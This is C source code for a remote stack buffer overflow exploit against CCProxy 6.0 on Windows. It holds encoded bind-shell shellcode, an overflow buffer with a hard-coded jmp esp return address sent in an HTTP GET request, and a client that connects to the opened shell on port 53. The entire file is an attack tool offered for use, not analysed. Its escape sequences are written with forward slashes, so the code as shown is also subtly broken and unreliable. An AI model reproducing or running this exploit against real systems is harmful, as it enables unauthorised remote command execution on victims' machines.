CCproxy 6 Exploit CN Version

/*
* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit
* Author   : isno <isno@xfocus.org>
* Complie  : cl ccpx.c
* Usage    : ccpx <target_ip> [target_port]
*              default target_port is 808
* Stronger By Goldsun   5261314@sohu.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")

#define PPORT 808
#define XPORT 53
//lion's shellcode bind port 53
unsigned char shellcode[] =
"/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x7D/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
// shellcode
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0"
"/x71/x1E/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x9C/xC0/x71/xED/x99/x99/x99/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B"
"/x66/xCE/x75/x12/x41/x5E/x9E/x9B/x99/x99/xAC/xAA/x59/x10/xDE/x9D"
"/xF3/x89/xCE/xCA/x66/xCE/x69/xF3/x98/xCA/x66/xCE/x6D/xC9/xC9/xCA"
"/x66/xCE/x61/x12/x49/x1A/x75/xDD/x12/x6D/xAA/x59/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/x10/xCF/xA1/x10/xCF/xA5/x10/xCF/xD9/xFF/x5E/xDF"
"/xB5/x98/x98/x14/xDE/x89/xC9/xCF/xAA/x50/xC8/xC8/xC8/xF3/x98/xC8"
"/xC8/x5E/xDE/xA5/xFA/xF4/xFD/x99/x14/xDE/xA5/xC9/xC8/x66/xCE/x79"
"/xCB/x66/xCE/x65/xCA/x66/xCE/x65/xC9/x66/xCE/x7D/xAA/x59"
"/x35" //port
"/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59"
"/x5A/x71/x76/x67/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD"
"/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC"
"/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED/xCD/xF1/xEB/xFC/xF8/xFD/x99/xD5"
"/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6"
"/xAA/xAB/x99/xCE/xCA/xD8/xCA/xF6/xFA/xF2/xFC/xED/xD8/x99/xFB/xF0"
"/xF7/xFD/x99/xF5/xF0/xEA/xED/xFC/xF7/x99/xF8/xFA/xFA/xFC/xE9/xED"
"/x99/xFA/xF5/xF6/xEA/xFC/xEA/xF6/xFA/xF2/xFC/xED/x99";


int  Make_Connection(char *address,int port,int timeout);
void shell (int sock);

int main(int argc, char * argv[])
{
    SOCKET  csock, s2;
    WSADATA WSAData;
    int yn, offset, ret, pport;
    char line[80];
    char buf[8000], sbuf[10000];
    char local[100] = {0};
    char *localip;
    struct hostent * pHost;

    if(argc<2)
    {
        printf("CCPROXY 6 Exploit CN Writen By isno@xfocus.org & Compiled By Goldsun/n");
        printf("Usage: %s <target_ip> [target_port] [offset]/ndefault port is 808/n", argv[0]);
        return 1;
    }
    if(argc>=3)
        pport=atoi(argv[2]);
    else
        pport=PPORT;
    if(argc>=4)offset=atoi(argv[3]);
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed./n");
        WSACleanup();
        exit(1);
    }
    // 获取本机名
    gethostname((char*)local, sizeof(local)-1);
    // 获取本地 IP 地址
    pHost = gethostbyname((char*)local);
    localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);
    //offset=15-strlen(localip); //offset from target_ip len ret addr
    offset=2;
    printf("Local IP: %s Target IP: %s:%d/n",localip,argv[1],pport);
    printf("Target in the same subnet? [y/n] ");
    yn = _getch();
    if(yn == 0x6e || yn == 0x4e)
    {
        printf("/r/nHave  real Internet Ip Address ? [y/n] ");
        yn = _getch();
        if(yn == 0x6e || yn == 0x4e)
        {
            printf("/r/nYour gateway Internet ip address: ");
            gets(line);
            offset=15-strlen(line);
        }
    }
    //如果攻击目标为本地地址，则需要调整offset
    if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)
        //offset=15-strlen("127.0.0.1");
        offset=6;

    printf("/r/n[+] connecting to %s:%d/n", argv[1], pport);
    csock = Make_Connection(argv[1], pport, 10);
    if(csock<0)
    {
        printf("[-] connect err./n");
        exit(1);
    }
    printf("Offset: %d",offset);
    memset(buf, 0, sizeof(buf)-1);
    memset(buf, 0x41, 4045+offset);
    memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));
    printf("  Magic Length: %d + 16 =",strlen(buf));
    strcat(buf, "/xcd/x54/xfa/x7f"); //ret addr jmp esp
    strcat(buf, "/xb9/x41/x41/x41/x25/xc1/xe9/x14/x2b/xe1/xff/xe4"); //jmp back

    sprintf(sbuf, "GET /%s HTTP/1.0/r/n/r/n", buf);
    printf("  buffer length: %d/n",strlen(buf));
    printf("[+] send magic buffer.../n");
    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("[-] send err./n");
        exit(1);
    }
    closesocket(csock);
    Sleep(1000);
    printf("[+] connecting to CMD shell port.../n");
    s2 = Make_Connection(argv[1], XPORT, 10);
    if(s2<0)
    {
        printf("[-] connect err:-<maybe there's firewall/n");
        exit(1);
    }
    shell(s2);
    WSACleanup();
    return 0;
}

//  解析域名
unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

//  建立TCP连接
//  输入:
//       char * address  IP地址
//       int  port       端口
//       int  timeout    延时
//  输出:
//  返回:
//       成功 >0
//       错误 <=0    
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
    int     l;
    char    buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
        {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("[-] Connection closed./n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("[-] Connection closed./n");
                return;
            }
        }
        else
        {
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("[-] Connection closed./n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("[-] Connection closed./n");
                return;
            }
        }
    }
}